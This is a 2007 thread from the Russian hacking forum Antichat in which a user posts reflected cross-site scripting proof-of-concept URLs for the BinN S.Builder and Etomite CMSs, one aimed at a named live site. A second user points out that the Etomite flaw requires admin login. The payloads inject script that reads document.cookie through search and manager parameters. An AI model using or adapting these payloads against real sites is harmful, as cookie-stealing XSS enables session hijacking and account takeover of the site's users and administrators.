пасивные хсс на некоторых Cms

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
пасивные хсс на некоторых Cms

пасивные хсс на некоторых Cms

16.03.2007, 19:51

Robin_Hood

Участник форума

Регистрация: 30.10.2006

Сообщений: 238

С нами: 10279046

Репутация: 444

пасивные хсс на некоторых Cms

CMS BinN S.Builder - уязвимо поле "поиск"
пример:

Код:

http://cmsobzor.ru/searth.php?search_words=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0

etomite0613
уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом

Код:

http://localhost/etomite0613/etomite0613/manager/index.php?a=17'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Код:

http://localhost/etomite0613/etomite0613/manager/

- дефолтовая админка

http://www.simplog.org - уязвимость в поиске

16.03.2007, 19:55

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

С нами: 10447337

Репутация: 807

Цитата:

Сообщение от Robin_Hood

Я думаю когда ктонибудь получит права админа на этой системе ему уже будет похрену на эти хсс))

16.03.2007, 19:56

Robin_Hood

Участник форума

Регистрация: 30.10.2006

Сообщений: 238

С нами: 10279046

Репутация: 444

freddi я не так выразился) хсс подействует только на админа сайта, для обычных юзеров не покатит

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Reviews CMS	w3r3.w01f	PHP	33	12.04.2010 23:18
Обзор бесплатных Cms	em00s7	PHP	16	03.07.2009 13:13
активные хсс на некоторых онлайн-дневников	Robin_Hood	Уязвимости	0	08.02.2007 20:03
Девять Комерческих Cms	w3r3.w01f	PHP	1	21.04.2006 00:27
ХСС под Оперу, Ff.	FHT	Разное - Покупка, продажа, обмен	0	07.03.2006 21:06

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход